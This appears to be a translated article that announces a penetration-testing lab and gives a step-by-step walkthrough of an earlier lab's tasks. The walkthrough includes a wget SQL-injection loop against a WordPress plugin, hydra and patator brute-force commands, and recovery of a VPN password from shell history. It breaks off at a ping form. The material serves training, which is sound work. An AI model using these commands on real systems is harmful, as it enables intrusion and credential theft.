50 shades of token

Tomorrow at 12:00 Moscow time, a new penetration testing lab “Test lab 12” will be launched, which is a copy of the real corporate network with its inherent vulnerabilities and configuration errors. The laboratory’s website already has 25,000 registered participants, including leading information security experts from major Russian and international companies.

Below is information on the composition of the new laboratory, examples of finding and operating vulnerabilities and material for training.

The main focus in the laboratories is on realism: the IT structure is designed by analogy with the corporate networks of companies, bringing the actions of the attackers to real hacking. Participants acting as intruders try to exploit the vulnerabilities inherent, and, if successful, gain access to individual laboratory nodes, each of which contains a token. The winner is the participant who first collected all the tokens , that is, in fact, he had full control over the virtual corporate network.
')
Everyone who wishes, regardless of qualification level, can test penetration testing skills in conditions as close to real as possible without violating the law.

The new laboratory will consist of a distributed computer network, represented in the form of several perimeters with different levels of intrusion complexity. The first (outer) perimeter will be “pushed through” the easiest; further, the advancement will become more complicated. In the most difficult sector, we place vulnerabilities that are difficult to exploit with a large number of participants. This approach allows us to solve two problems at once:

allow everyone to evaluate their skills in the laboratory, while maintaining its realistic;
eliminate the situation in which performing the operation of certain types of vulnerabilities or conducting an attack, participants interfere with each other.

~~The film was shot~~ In the laboratory were used:

Various network services (Mail, DNS, AD and VPN, etc.), SIEM and DBMS;
WebApp and API (PHP, Python, Django, Java);
Self-written desktop applications;
Additional support services to make it realistic.

To pass the laboratory will require:

skills in working with various network protocols;
the ability to analyze data from the SIEM system, configure correlation filters, and so on;
experience reverse engineering;
experience finding vulnerabilities in network services and web applications.

Private Lab Penetration Testing

We decided to lay out the implementation of several tasks of the past private laboratory, which was developed this summer, to help novice specialists to quickly obtain basic competencies.

All information regarding the composition of the laboratory (systems, users, etc.) is fictional and serves only to create its realistic image.

The penetration testing techniques described in the article are educational in nature. Do not violate the law.

The entire structure of the fictional UNIONSEC organization, consisting of 15 servers, was located behind the 192.168.102.10 gateway, accessible after the VPN connection was established. The participants were given the task - to compromise the corporate network of the laboratory. The result of the exploitation of each pledged vulnerability was a token that had to be passed through the form on the page lab.pentestit.ru .

The laboratory attacked 7 teams of two participants, but no one managed to compromise the entire network. Nevertheless, some teams showed decent results.

Working in the laboratory required experience in working with various tools and penetration testing. In addition, some tasks could not be completed without knowledge in development and reverse engineering. Considering the limited time that was given to the participants for the assignment, the performance of almost half of the assignments, in our opinion, is a worthy result.

Intelligence service

Using the nmap utility, we get a list of open ports:

nmap 192.168.102.10 -sV

The site of the company

At 192.168.102.10 in the section "Contact us" we see the list of E-mail addresses:

According to the HTML code of the application, we can assume that it uses Wordpress CMS and contains the plugin wp-symposium-15.1.

Through www.exploit-db.com we determine that the plugin is vulnerable to SQL injection. Through URI 192.168.102.10/wp-content/plugins/wp-symposium-15.1/get_album_item.php?size= "we are trying to exploit the vulnerability using the BASH script:

 #!/bin/bash for ((i=0; i<= 10; i++)) do wget --no-proxy -q -O- "http://192.168.102.10/wp-content/plugins/wp-symposium-15.1/get_album_item.php?size=SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA limit 1 offset $i; --" echo "" done

Get the list of databases:

information_schema
wp_db

and after exploiting the vulnerability, the token:

wget -q -O- 192.168.102.10/wp-content/plugins/wp-symposium-15.1/get_album_item.php?size=* from token; --"

post office

We perform brute-force use of hydra tools:

hydra smtp://192.168.101.10 -s 25 -L /tmp/emails -P /tmp/pass

Using the obtained data, we authorize the mail server's WUI and get the token:

Openvpn

Connection

From the web-site http://192.168.102.10:88 load the file “openvpn.conf”. After performing a server scan (for example, with the DirBuster utility), we find .bash_history :

-bash: generating new OpenVPN password for user admin: command not found
-bash: generating: command not found
-bash: date +%F: command not found
-bash: echo "admin:`date +%F | md5sum | sed -s 's/ -//'`" > /etc/openvpn/user.pass: command not found
cat /etc/openvpn/user.pass
service openvpn restart
exit

where you can find the user name, as well as the password generation algorithm. To play a previously created password, use the exact date of file creation:

and perform the conversion according to the command history. The received password is used for VPN authentication.

Server scan

Having connected to the VPN, we will perform the server port scan:

We get the token at http://10.255.0.1:8080 :

TERMINAL

The VPN server sends us several routing to the internal networks, after scanning which we discover several hosts with an open 22 port. We try to log in under the account dev . Having connected to one of the servers, we find the presence of the / home / support directory and try to select a password for the account of the same name:

patator ssh_login host=192.168.11.5 user=support password=FILE0 0=usr/share/wordlists/rockyou.txt -x ignore:fgrep='Authentication failed'

Having picked up the password, we get the token located in the home directory:

Reverse engineering

On the TERMINAL server, we are able to find the executable file admin.bin , which is completed when the password is requested. With the help of the reverse we get the password fv34cm3cm , which is a token. When you enter it, we get SSH PRIVATE KEY .

With the private key, we perform authentication on the server 192.168.11.2 , in which we find the file dump.pcap in the /opt/ dump.pcap . We analyze the network traffic dump from the file and extract the token as well as the password for the BASIC authorization on the web server 192.168.11.3 :

tcpdump -r /tmp/dump.pcap -A | grep token

API

At 192.168.11.3 there is an API available from the administrator's PC. Using the broadcast ports (for example, through SSH), we begin his study.

Having exploited the vulnerability found in the API, we get a token that is part of the admin user password:

A web application is available at http://172.16.0.4 , which is under development. From the file readme.html we get a list of the pages being developed:

When opening http://172.16.0.4/availability.php we get an error. We try to repeat the action using the parameter REFERRER http://172.16.0.4/index.html , after which the form with the ping button becomes available: